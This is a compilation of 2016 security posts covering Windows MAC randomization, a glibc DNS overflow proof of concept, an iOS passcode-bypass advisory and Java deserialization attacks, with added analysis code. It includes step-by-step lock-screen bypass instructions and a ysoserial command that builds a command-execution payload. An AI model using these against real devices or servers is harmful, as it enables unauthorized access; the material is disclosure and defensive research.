With on-going malware threats and a growing trend in adopting BYOD, IT must recognize the urgency to fundamentally secure corporate devices from power on to off. UEFI Secure Boot is an industry standard and a mechanism to ensure hardware integrity every time and all the time. There are specific hardware requirements and configurations that must first be put in place for solutions relying on UEFI Secure Boot, like Device Guard for Windows 10 Enterprise. Therefore, rolling out UEFI 2.3.1 or later, and TPM 2.0 as well, as important hardware components is what lets IT leverage hardware-based security features to fundamentally secure corporate devices.

Source: https://yungchou.wordpress.com/2016/03/04/an-introduction-of-uefi-secure-boot-in-windows-10-enterprise/
16. How MAC Address Randomization Works on Windows 10

When Apple announced its devices would use random MAC addresses when searching for Wi-Fi networks, it received extensive media attention. And rightly so. It prevents companies from tracking your movements, and Apple was the first major player to start doing this. Windows and Android are quietly trying to catch up. As a result, some devices running Windows now support MAC address randomization, and we will discuss how it's implemented, and where it fails. This information is a small selection from the recent paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms.

How it works

Microsoft first added support for MAC address randomization in Windows 10. Unfortunately, it's only available if you have a WiFi card and driver that support it. For example, the Intel 7265 AC, when using the latest driver, supports randomization [1]. You can see if your hardware supports MAC address randomization by going through the following menus. If your hardware supports MAC address randomization, you will see the following option at the top of the window. As you can see, I have it enabled on my laptop. So far it's been working quite well.

What's very interesting about Microsoft's approach is that it also uses random MAC addresses when connecting to a wireless network. In contrast, Apple only uses random addresses when searching for nearby networks, and it falls back to its original address when connecting to a network. In this aspect Windows 10 offers better privacy than Apple.

Using a random MAC address to connect to a network can cause problems if users are authenticated (i.e., recognized) based on their MAC address [2]. Interestingly, Windows avoids this issue by always using the same random address every time it connects to a specific network. For example, let's say you want to pay for Wi-Fi access, and they authenticate you based on your MAC address. Then this is not a problem. The first time you connect, Windows will generate a random MAC address. And if you reconnect to this network at a later point in time, Windows will reuse the previously generated address. Therefore the system can still recognize you, and you don't have to pay twice. There's one downside to this approach: since you always use the same address when connecting to a particular network, an adversary can learn when certain devices connect to specific networks. Nevertheless, compared to the old situation where you'd always use the original MAC address, it improves your privacy.

Technically, the random MAC address that is used to connect to a network is calculated as [5]:

address = SHA-256(SSID, real MAC address, connectionId, secret)[:6]

Here SSID is the name of the network you are connecting to, real MAC address the original address of your network interface, and connectionId is a value that changes every time the user removes (and re-adds) the network (i.e., this value is updated if you "forget" the network under Windows 10). The secret parameter is a 256-bit cryptographic random number, generated during system initialization, and kept the same across reboots. Every interface has a different value of the secret parameter, to assure each interface gets a different random MAC address. Finally, bits in the most significant byte of address are set so it becomes a locally administered, unicast address. While the presentation by Huitema partly described this process, our paper is the first to describe this formula in full detail.

It's also possible to disable randomization for certain networks. In this case Windows will use the original address when connecting to a network. You can configure this through the following settings when you are currently connected to the network. Notice that the user has three options for each specific network:
- On: the same random MAC address is always used when connecting to this network.
- Off: the original MAC address is used.
- Change daily: every day a new random MAC address is used.

Remark that if randomization is enabled, independent of the above options, Windows 10 will always use random MAC addresses when scanning for nearby networks. This "scanning" address changes every time you connect (and disconnect) from a network, and when you restart your device [3]. Hence it doesn't change that frequently, but it's still sufficient to prevent tracking over extended periods of time. In contrast, Apple changes the scanning address roughly every few minutes, which provides more privacy.

Basic Security Analysis

Randomization as implemented in Windows 10 significantly improves your privacy. So enable it! Unfortunately, it's not perfect, because there are still some ways to defeat or bypass it. The first weakness is that the sequence number contained in WiFi frames is not reset when changing the (random) MAC address. This sequence number, which is present in most Wi-Fi frames, is used to detect retransmissions, and is incremented by one after successfully transmitting a frame. As shown in the picture below, when the MAC address changes because the user connects to a network, the sequence counter is not reset. The last frame from ea:69:0a:* has sequence number 92, and the other address 7c:5c:f8:* has sequence number 94. Based on this an adversary can reasonably conclude that both frames are sent by the same device. In other words, he learns that the same device was using both addresses, defeating the purpose of address randomization.

The second problem is that Windows 10 reveals its real MAC address when interacting with Hotspot 2.0 networks. But what's Hotspot 2.0? Simply put, Hotspot 2.0 is a new standard to automatically and securely roam between WiFi networks. No manual interaction is needed. Your device automatically determines whether you have the appropriate credentials (passwords) to connect to a network. Think of this like the cellular network: when you get off the plane, your phone automatically finds and connects to a foreign cellular network. Hotspot 2.0 provides a similar experience for WiFi. In order to accomplish automatic roaming, Hotspot 2.0 sends ANQP queries to the Access Point before connecting to it. These ANQP queries request detailed information about the wireless network. This information includes the credentials that are needed to connect with the hotspot, whether the hotspot provides internet access or only local network access, etc. Unfortunately, Windows 10 sends these ANQP queries using the real (original) MAC address. In the first probe request it uses the random MAC address 2a:b3:e6:*. These probe requests are used to detect the presence of networks. If there's a Hotspot 2.0 network nearby, Windows will send ANQP requests using the real MAC address, in this case 7c:5c:f8:*. Therefore an attacker can obtain your real MAC address by advertising a Hotspot 2.0 network. Thankfully, Windows 10 only sends ANQP queries if at least one Hotspot 2.0 network is configured. Since this standard is not yet widely deployed, few users will have such a network configured [4].

Detailed Security Analysis

Want to know all flaws that are present in existing implementations of MAC address randomization? And this specifically for Android, Apple, Linux, and Windows? Then read my paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms [5]! It has everything explained in technical detail.

References and Footnotes

[1] If you have an Intel 7260 AC, you can also force Windows 10 to use the drivers of the Intel 7265 AC. Your device will still work, and will support MAC address randomization.
[2] Even though authentication based on the MAC address is utterly insecure (an adversary can easily spoof a MAC address), it's still used by many systems.
[3] C. Huitema. Personal communication, Nov. 2015.
[4] One notable exception is the Passpoint configuration provided by Boingo. Essentially Passpoint is a synonym of Hotspot 2.0. If you have this configuration installed, you have a Hotspot 2.0 capable device, and the Boingo configuration will use Hotspot 2.0. This means Windows will send ANQP queries to nearby Hotspot 2.0 networks.
[5] M. Vanhoef, C. Matte, M. Cunche, L. S. Cardoso, and F. Piessens. Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms. AsiaCCS 2016.

Posted by Mathy at 20:21
Source: http://www.mathyvanhoef.com/2016/03/how-mac-address-randomization-works-on.html
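The per-network derivation and the sequence-number weakness from the post above, as an added example that is not code from the post or the paper. The post gives the formula but not how Windows serializes the four inputs before hashing, so the concatenation order and field widths used here are an assumption; the capture is constructed to mirror the post's 92-then-94 example.

```python
"""Per-network random MAC derivation in the style the post describes for
Windows 10, plus the sequence-number correlation that undermines it.
Added example; the byte encoding fed to SHA-256 is an assumption."""
import hashlib
from typing import List, Sequence, Tuple

SEQ_MODULUS = 4096  # 802.11 sequence numbers are 12 bits wide


def derive_network_mac(ssid: str, real_mac: bytes, connection_id: int,
                       secret: bytes) -> bytes:
    """address = SHA-256(SSID, real MAC, connectionId, secret)[:6], then force the
    locally-administered bit on and the multicast bit off in the first byte.

    Assumption: the inputs are simply concatenated as UTF-8 SSID, 6-byte MAC,
    4-byte big-endian connectionId and 32-byte secret; the post does not state
    the real serialization, only the formula."""
    if len(real_mac) != 6:
        raise ValueError("real_mac must be 6 bytes")
    if len(secret) != 32:
        raise ValueError("secret must be 256 bits")
    material = (ssid.encode("utf-8") + real_mac
                + connection_id.to_bytes(4, "big") + secret)
    addr = bytearray(hashlib.sha256(material).digest()[:6])
    # bit 1 of the first byte: locally administered; bit 0: multicast (clear it)
    addr[0] = (addr[0] | 0x02) & 0xFE
    return bytes(addr)


def is_locally_administered_unicast(mac: bytes) -> bool:
    return (mac[0] & 0x03) == 0x02


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


# Constructed capture: (source MAC, 802.11 sequence number) in arrival order.
# The numbers mirror the post's example: scanning address ends at 92, the
# per-network address starts at 94.
SAMPLE_FRAMES: List[Tuple[str, int]] = [
    ("ea:69:0a:11:22:33", 90),   # random scanning address, probe requests
    ("ea:69:0a:11:22:33", 92),
    ("7c:5c:f8:44:55:66", 94),   # address switches when the device connects...
    ("7c:5c:f8:44:55:66", 95),   # ...but the counter just carries on
    ("00:11:22:33:44:55", 3000), # an unrelated device
]


def link_by_sequence(frames: Sequence[Tuple[str, int]],
                     max_gap: int = 8) -> List[Tuple[str, str]]:
    """Return (old_mac, new_mac) pairs where a frame from a different source
    continues the previous frame's sequence counter within max_gap steps.
    A driver that reset the counter on every address change would defeat this."""
    links = []
    for (mac_a, seq_a), (mac_b, seq_b) in zip(frames, frames[1:]):
        if mac_a == mac_b:
            continue
        gap = (seq_b - seq_a) % SEQ_MODULUS  # handles the 12-bit wrap-around
        if 1 <= gap <= max_gap:
            links.append((mac_a, mac_b))
    return links


if __name__ == "__main__":
    secret = bytes(range(32))  # constructed; Windows draws this at first boot
    real = bytes.fromhex("7c5cf8445566")
    print("CoffeeShop, first add :", mac_str(derive_network_mac("CoffeeShop", real, 1, secret)))
    print("CoffeeShop, re-added  :", mac_str(derive_network_mac("CoffeeShop", real, 2, secret)))
    print("linked by sequence    :", link_by_sequence(SAMPLE_FRAMES))
```

Forgetting and re-adding the network bumps connectionId, which is why that is the user-visible way to get a new address for a network; the sequence-number check works on any capture, whatever the derivation, because it only looks at consecutive frames.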
17. CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability
Posted by jstester007 on March 7th, 2016

Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (it hasn’t got a cool name like GHOST, unfortunately…). It appears to be a highly critical vulnerability and covers a large number of systems. It allows remote code execution by a stack-based overflow in the client side DNS resolver. In this post we would like to present our analysis.

Google POC overview

Google POC Network Exploitation Timeline

Google POC Exploit Code Analysis

First response
Code snippet
Packet capture snippet

The dw() function calls the “struct” module from the Python library. According to the documentation, it performs conversion between Python values and C structs represented as Python strings. In this case, it interprets a Python integer and packs it into little-endian short type binary data. This is a valid response sent by the “malicious” DNS server when it receives any initial queries. This response packet is intentionally constructed in large size (with 2500 bytes of null); it forces the client to retry over TCP and allocate an additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatenated.

Second response
Code snippet
Packet capture snippet

This is the second response sent by the malicious DNS server. It is a malformed packet sending a large number of “fake records” (184 Answer RRs) back to the client. According to Google, this forces __libc_res_nsend to retry the query.

Third response
Code snippet
Packet capture snippet

This is the third response sent by the “malicious” DNS server. It is another malformed packet which is carrying the payload. A JUMPSEC researcher has modified the Google POC code to identify the number of bytes needed to cause a segmentation fault (possibly overwriting the RET address) of the buffer. It is found that the RET address is being overwritten on the 2079th byte. With the addition of the return-to-libc technique, an attacker can bypass OS protections such as the NX bit or ASLR and perform remote code execution.

Google POC debugging and crash analysis

JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated on in gaih_getanswer. The entry address has been overwritten with 0x4443424144434241 (ABCDABCD). The state of the registers also shows the overflowed bytes.

SEGFAULT from vulnerable client. RET address is overwritten with “ABCDABCD”
Backtrace
Registers

JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used…

Iceweasel crashing

Conclusion

The best way to mitigate this issue is to enforce proper patch management. Make sure to update all your systems with the latest version of glibc. If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered, then the following Wireshark filter could be useful: (DNS.length>2048 to see malformed packets). A DNS response has a maximum of 512 bytes (typically); note that the DNS reply is truncated. Even if the client does not accept a large response, smaller responses can be combined into a large one which can also trigger the vulnerability. A possible filter is to monitor the size of the entire conversation, as a distinct amount of bytes in total is required to trigger specific responses from the vulnerable client, and all of them require more than 2048 bytes. The above vulnerability can be fixed by patching. If you are running RedHat or CentOS, a simple yum -y update glibc will update the libc and resolve the issue.

Reference links
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547
- http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html
- https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

Source: https://labs.jumpsec.com/2016/03/07/cve-2015-7547-glibc-getaddrinfo-dns-vulnerability/
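The detection idea in the conclusion above (responses over 2048 bytes, and the size of the whole conversation) turned into code, as an added example that is neither JUMPSEC's nor Google's: a parser for the length-prefixed DNS-over-TCP framing that flags responses that are too large or claim too many answer records, run over a byte stream constructed here to have the same shape as the PoC's exchange (one query, a 2500-byte-padded response, a response claiming 184 answer RRs). The constructed messages carry no real answer section, only the header counts; that is enough for these checks but is a simplification.

```python
"""Spotting the oversized DNS-over-TCP responses the CVE-2015-7547 PoC relies on.
Added example; the byte stream below is constructed here, not a real capture."""
import struct
from typing import List, NamedTuple


class DnsMessage(NamedTuple):
    offset: int        # position of the 2-byte length prefix in the stream
    length: int        # message length as declared by the prefix
    txid: int
    is_response: bool  # QR bit of the flags word
    qdcount: int
    ancount: int       # number of answer RRs the header claims


def parse_tcp_dns_stream(stream: bytes) -> List[DnsMessage]:
    """Split a sequence of DNS-over-TCP messages. Each one is prefixed by a
    big-endian 16-bit length (RFC 1035 section 4.2.2); a trailing message whose
    body is incomplete is dropped rather than guessed at."""
    messages = []
    pos = 0
    while pos + 2 <= len(stream):
        (length,) = struct.unpack_from("!H", stream, pos)
        body = stream[pos + 2:pos + 2 + length]
        if len(body) < length:
            break
        if length >= 12:  # a full 12-byte header is present
            txid, flags, qd, an, _ns, _ar = struct.unpack_from("!6H", body, 0)
            messages.append(DnsMessage(pos, length, txid, bool(flags & 0x8000), qd, an))
        else:
            messages.append(DnsMessage(pos, length, 0, False, 0, 0))
        pos += 2 + length
    return messages


def suspicious_responses(stream: bytes, size_threshold: int = 2048,
                         rr_threshold: int = 100) -> List[DnsMessage]:
    """Responses larger than the post's 2048-byte Wireshark filter, or claiming
    an implausible number of answer records as the PoC's second response does."""
    return [m for m in parse_tcp_dns_stream(stream)
            if m.is_response and (m.length > size_threshold or m.ancount > rr_threshold)]


def conversation_bytes(stream: bytes) -> int:
    """Total bytes of complete messages; the post suggests watching this because
    several smaller responses can add up to the same effect as one large one."""
    return sum(2 + m.length for m in parse_tcp_dns_stream(stream))


def build_message(txid: int, response: bool, ancount: int = 0, padding: int = 0,
                  qname: bytes = b"\x03foo\x03bar\x00") -> bytes:
    """Construct a length-prefixed message with a header, one A question and
    optional zero padding. Only the header's ANCOUNT is set; no RRs are encoded."""
    flags = 0x8180 if response else 0x0100
    header = struct.pack("!6H", txid, flags, 1, ancount, 0, 0)
    question = qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    body = header + question + b"\x00" * padding
    return struct.pack("!H", len(body)) + body


# Constructed conversation with the PoC's shape: a query, a response padded with
# 2500 null bytes (the one that forces the TCP retry), then a response whose
# header claims 184 answer records.
SAMPLE_STREAM = (
    build_message(0x1234, response=False)
    + build_message(0x1234, response=True, padding=2500)
    + build_message(0x1234, response=True, ancount=184)
)

if __name__ == "__main__":
    for m in suspicious_responses(SAMPLE_STREAM):
        print(f"offset={m.offset} length={m.length} ancount={m.ancount}")
    print("conversation bytes:", conversation_bytes(SAMPLE_STREAM))
```

The length prefix is trusted only as far as the bytes actually present, so a truncated stream (a capture cut mid-message) never produces a phantom message; feeding reassembled TCP payload from a capture tool into parse_tcp_dns_stream is the intended use.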
18. Climber
Automated auditing tool to check UNIX/Linux systems for misconfigurations which may allow local privilege escalation.

Dependencies
- python >= 2.7
- python-crypto
- python-mako
- python-paramiko

Note
Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH: https://github.com/knipknap/exscript. This module is already included in the Climber sources.

License
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

Source: https://github.com/raffaele-forte/climber
19. Romanian ATM hacker exploits vulnerability in FENCE, escapes jail
Robber clobbered but catching carder is harder
8 Mar 2016 at 05:56, Darren Pauli

A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut his way out of a Bucharest prison and escaped custody. Renato Marius Tulli, 34, escaped Police Precinct 19 with Grosy Gostel, 38, held on robbery charges, sparking a city-wide hunt, local media report. Gostel has been caught while malware man Tulli remains on the run. The carder and the robber cut a hole in the mesh fence and jumped an outer fence at the police station. Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic. They used the Tyupkin malware, loading it onto ATMs using a CD slotted into the back of the machines. That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico. There is little preventing the self-deleting malware from being used in other countries, experts say. ®

Source: http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/
20. Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities

From: Vulnerability Lab <research () vulnerability-lab com>
Date: Mon, 7 Mar 2016 09:52:02 +0100

Document Title:
===============
Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link)

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1778

Video: http://www.vulnerability-lab.com/get_content.php?id=1779

Release Date:
=============
2016-03-07

Vulnerability Laboratory ID (VL-ID):
====================================
1778

Common Vulnerability Scoring System:
====================================
6.4

Product & Service Introduction:
===============================
iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft's Windows Phone (Windows CE) and Google's Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple's App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google's Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have been sold through June 2012.

( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS )

Apple Inc. is an American multinational technology company headquartered in Cupertino, California, that designs, develops, and sells consumer electronics, computer software, and online services. Its hardware products include the iPhone smartphone, the iPad tablet computer, the Mac personal computer, the iPod portable media player, and the Apple Watch smartwatch. Apple's consumer software includes the OS X and iOS operating systems, the iTunes media player, the Safari web browser, and the iLife and iWork creativity and productivity suites. Its online services include the iTunes Store, the iOS App Store and Mac App Store, and iCloud.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Apple_Inc. )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory research team discovered multiple connected passcode protection bypass vulnerabilities in iOS v9.0, v9.1 and v9.2.1 for the Apple iPhone (5, 5s, 6 & 6s) and the iPad (mini, 1 & 2).

Vulnerability Disclosure Timeline:
==================================
2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-04: Vendor Notification (Apple Product Security Team)
2016-**-**: Vendor Response/Feedback (Apple Product Security Team)
2016-**-**: Vendor Fix/Patch (Apple Developer Team)
2016-**-**: Security Acknowledgements (Apple Product Security Team)
2016-03-07: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Apple
Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
An auth passcode bypass vulnerability has been discovered in iOS v9.0, v9.1 and v9.2.1 for the Apple iPhone (5, 5s, 6 & 6s) and the iPad (mini, 1 & 2). The vulnerability type allows a local attacker with physical device access to bypass the passcode protection mechanism of Apple mobile iOS devices.

The vulnerabilities are located in the 'Appstore', 'Buy more Tones' or 'Weather Channel' links of the Clock, Event Calendar & Siri user interface. Local attackers can use Siri, the event calendar or the available clock module for an internal browser link request to the App Store that is able to bypass the customer's passcode or fingerprint protection mechanism. The attacker can exploit the issue in several ways with Siri, the events calendar or the clock app of the control panel on default settings to gain unauthorized access to the affected Apple mobile iOS devices.

1.1
In the first scenario the attacker requests, for example via Siri, a non-existing app, after which Siri answers with an App Store link to search for it. The attacker then opens the link and a restricted browser window is opened, listing some apps. At that point it is possible to switch back without authorization to the internal home screen by interaction with the home button or with Siri again. The link to bypass the controls is visible in the Siri interface only and is called "open App Store". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1.

1.2
In the second scenario the attacker uses the control panel to gain access to the non-restricted clock app. The local attacker opens the app via Siri or via the panel and then opens the timer, to the End Timer or Radar module. The developers of the app allow Apple customers to buy more sounds for alerts and implemented a link for it. By pushing the link a restricted App Store browser window opens. At that point it is possible to switch back without authorization to the internal home screen by interaction with the home button or with Siri again. The link to bypass the controls becomes visible in the Alert - Tone (Wecker - Ton) & Timer (End/Radar) and is called "Buy more Tones". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1.

1.3
In the third scenario the attacker opens the clock app via the panel or by a Siri request. After that he opens the internal world clock module. In the bottom right is a link to the Weather Channel that redirects to the store as long as the weather app is deactivated. By pushing the link a restricted App Store browser window opens. At that point it is possible to switch back without authorization to the internal home screen by interaction with the home button or with Siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image used as a link. This special case is limited to the iPad because only those models display the web world map. In the iPhone version the bug does not exist because the map is not displayed, since a limited template is used. The vulnerability is exploitable in the Apple iPad 2 with iOS v9.0, v9.1 & v9.2.1.

1.4
In the fourth scenario the attacker opens the 'App & Event Calendar' panel via Siri. After that the attacker opens, under the Tomorrow task, the 'Information of Weather' (Informationen zum Wetter - Weather Channel LLC) link at the bottom left. As long as the weather app is deactivated on the Apple iOS device, a new browser window opens to the App Store. At that point it is possible to switch back without authorization to the internal home screen by interaction with the home button or with Siri again. The link to bypass the controls becomes visible in the App & Events Calendar panel. The vulnerability is exploitable in the Apple iPad 2 with iOS v9.0, v9.1 & v9.2.1.

The security risk of the passcode bypass vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.4. Exploitation of the passcode protection mechanism bypass vulnerability requires no privileged iOS device user account or low user interaction. Physical Apple device access is required for successful exploitation. Successful exploitation of the vulnerability results in unauthorized device access, mobile Apple device compromise and leak of sensitive device data like the address book, photos, SMS, MMS, emails, phone app, mailbox, phone settings or access to other default/installed mobile apps.

Vulnerable Module(s):
[+] PassCode (Protection Mechanism)

Affected Device(s):
[+] iPhone (Models: 5, 5s, 6 & 6s)
[+] iPad (Models: mini, 1 & 2)

Affected OS Version(s):
[+] iOS v9.0, v9.1 & v9.2.1

Proof of Concept (PoC):
=======================
The passcode protection mechanism bypass vulnerabilities can be exploited by local attackers with physical device access and without a privileged or restricted device user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1.1 Manual steps to reproduce the vulnerability ... (Siri Interface - App Store Link)
iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
3. Ask Siri to open a non-existing app
Note: "Open App Digital" (Öffne App Digital)
4. Siri responds to the non-existing app and asks to search in the App Store
5. Now an "open App Store" button becomes visible to push (do it!)
6. A new restricted browser window opens with the App Store bottom menu links
7. Click to updates and open the last app, or push the home button twice to let the task slide preview appear
8. Now choose the active front screen task
9. Successful reproduce of the passcode protection bypass vulnerability!

1.2 Manual steps to reproduce the vulnerability ... (Clock & Timer - Buy more Tones Link)
iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open World Clock" (Öffne App Weltuhr)
3. Push the 'Timer' module button at the bottom
4. Now push the Radius or End Timer button in the middle of the screen
Note: A listing opens with the sounds collection and on top is a web link commercial
5. Push the button and a new restricted browser window opens with the App Store bottom menu links
6. Click to updates and open the last app, or push the home button twice to let the task slide preview appear
7. Now choose the active front screen task
8. Successful reproduce of the passcode protection bypass vulnerability!

Note: The vulnerability can also be exploited by pushing the same link in the Alerts Timer (Wecker) next to adding a new one.

1.3 Manual steps to reproduce the vulnerability ... (Clock World - Weather Channel Image Link)
iPad (Models: 1 & 2)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open App Clock" (Öffne App Uhr)
3. Switch in the bottom module menu to world clock
Note: at the bottom right is an image of the Weather Channel LLC network
4. Push the image of the Weather Channel LLC company in the world map picture
Note: Weather app needs to be deactivated by default
5. After pushing the button a new restricted browser window opens with the App Store bottom menu links
6. Click to updates and open the last app, or push the home button twice to let the task slide preview appear
7. Now choose the active front screen task
8. Successful reproduce of the passcode protection bypass vulnerability!

Note: The issue is limited to the iPad 1 & 2 because of the extended map template!

1.4 Manual steps to reproduce the vulnerability ... (Events Calendar App - Weather Channel LLC Link)
iPad (Models: 1 & 2) & iPhone (Models: 5, 5s, 6 & 6s)

1. Take the iOS device and lock the passcode to the front
2. Open Siri by activation via Home button (push 2 seconds)
Note: "Open Events/Calendar App" (Öffne Events/Kalender App)
3. Now push, at the bottom of the screen next to the Tomorrow (Morgen) module, the 'Information of Weather Channel' link
Note: Weather app needs to be deactivated by default
4. After pushing the button a new restricted browser window opens with the App Store bottom menu links
5. Click to updates and open the last app, or push the home button twice to let the task slide preview appear
6. Now choose the active front screen task
7. Successful reproduce of the passcode protection bypass vulnerability!

Video Demonstration:
In the attached video demonstration we show how to bypass the passcode of the iPhone 6s via the Siri App Store link and the timer "Buy more Tones" link. In the video we activated the passcode and set up the control center to be available by default on the locked mobile front screen. Siri was activated as well by default.

Solution - Fix & Patch:
=======================
The vulnerabilities can be temporarily patched by the end user by hardening the device settings. Deactivate the Siri module permanently in the Settings menu. Also deactivate the Events Calendar without passcode, to disable the push function of the Weather Channel LLC link. In the next step deactivate the public control panel with the timer and world clock to disarm exploitation. Activate the weather app settings to prevent the redirect when the module is disabled by default in the events calendar. Finally, Apple needs to issue a patch as a workaround for the issue, but until this happens a temporary solution has been published as well.

Security Risk:
==============
The security risk of the passcode protection mechanism bypass vulnerabilities in the Apple iPad and iPhone mobile devices is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research () vulnerability-lab com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research () vulnerability-lab com) to ask for permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com

Source: http://seclists.org/fulldisclosure/2016/Mar/15
21. Java Deserialization Attacks with Burp

Eric Gruber | March 2, 2016

Introduction

This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here.

The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and HTTP response, assuming that HTTP is the protocol that is being used for communication. For this blog, HTTP is going to be assumed, and to perform any type of proxying for HTTP we will use Burp.

Burp Proxy

Here's a simple example of what a Burp proxied HTTP request with a serialized Java object in its body looks like:

In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab.

Generating Serialized Exploits

There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I'm a big fan of Chris Frohoff's ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of me writing this. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file:

    java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload

We can then copy the serialized output into Burp using the paste from file context menu item:

Which will result in the following:

Generating Serialized Exploits in Burp

Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It essentially is a modified Repeater tab that uses the payload generation from ysoserial.

To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select the Send to Java Serial Killer item. A new tab will appear in Burp with the request copied over into a new message editor window.

In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run.

For an example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know it is running Commons-Collections 3.1. We just set the payload in the drop down menu and then type the command we want and press the serialize button. Pressing the little question mark button will also display the payload types and the software versions they are targeting if you need more information.

